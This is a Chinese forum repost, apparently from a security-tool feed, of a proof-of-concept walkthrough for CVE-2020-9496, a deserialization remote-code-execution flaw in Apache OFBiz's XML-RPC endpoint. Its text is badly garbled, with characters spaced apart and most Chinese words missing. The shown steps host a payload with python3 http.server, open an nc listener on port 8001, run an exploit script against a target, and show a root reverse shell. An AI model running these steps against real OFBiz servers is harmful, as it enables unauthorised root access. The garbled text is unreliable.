搜索

[29107] 2021-08-04_【安全工具】CVE-2020-9496ApacheOFBiz反序列化导致远程命令执行(RCE)

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-19
2021-08-04_【安全工具】CVE-2020-9496ApacheOFBiz反序列化导致远程命令执行(RCE) C V E - 2 0 2 0 - 9 4 9 6   A p a c h e   O F B i z   ( R C E ) O t s   2 0 2 1 - 0 8 - 0 4 O t s   P O C     C V E - 2 0 2 0 - 9 4 9 6   A p a c h e   O F B i z   1 7 . 1 2 . 0 1   ( R C E ) C V E - 2 0 2 0 - 9 4 9 6   w e b t o o l s     2     x m l r p c   x m l r p c     p i n g 使 G i t H u b   A l v a r o   M u n o z   p w n t e s t e r @ g i t h u b . c o m   1 7 . 1 2 . 0 1   1 8 . 1 2 . 0 1 1 7 . 1 2 . 0 4 h t t p s : / / s e c u r i t y l a b . g i t h u b . c o m / a d v i s o r i e s / G H S L - 2 0 2 0 - 0 6 9 - a p a c h e _ o f b i z / A p a c h e h t t p s : / / i s s u e s . a p a c h e . o r g / j i r a / b r o w s e / O F B I Z - 1 1 7 1 6 G i t H u b P O C h t t p s / / g i t h u b . c o m / g 3 3 x t e r / C V E - 2 0 2 0 - 9 4 9 6 使   1   使   p y t h o n 3     H T T P     2     n c   l i s t e n e r   8 0 0 1   3     U R L     4     5     n c   >   s u d o   p y t h o n 3   - m   h t t p . s e r v e r   8 0 >   n c   - n l v p   8 0 0 1 u r l = ' h t t p s : / / 1 2 7 . 0 . 0 . 1 '   #   C H A N G E   T H I S                                                                                                                   p o r t = 8 4 4 3   #   C H A N G E   T H I S >   . / c v e - 2 0 2 0 - 9 4 9 6 . s h   - i   I P   - p   P O R T   n c   - n l v p   8 0 0 1 l i s t e n i n g   o n   [ a n y ]   8 0 0 1   . . . c o n n e c t   t o   [ 1 0 . 1 0 . x . x ]   f r o m   ( U N K N O W N )   [ 1 0 . 1 0 . x . x ]   5 7 5 0 0 b a s h :   c a n n o t   s e t   t e r m i n a l   p r o c e s s   g r o u p   ( 3 1 ) :   I n a p p r o p r i a t e   i o c t l   f o r   d e v i c e b a s h :   n o   j o b   c o n t r o l   i n   t h i s   s h e l l r o o t @ p o c : / u s r / s r c / a p a c h e - o f b i z - 1 7 . 1 2 . 0 1 #   i d
h t t p s : / / g i t h u b . c o m / s 4 d b r d / C V E - 2 0 2 0 - 9 4 9 6 i d u i d = 0 ( r o o t )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) r o o t @ p o c : / u s r / s r c / a p a c h e - o f b i z - 1 7 . 1 2 . 0 1 #
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理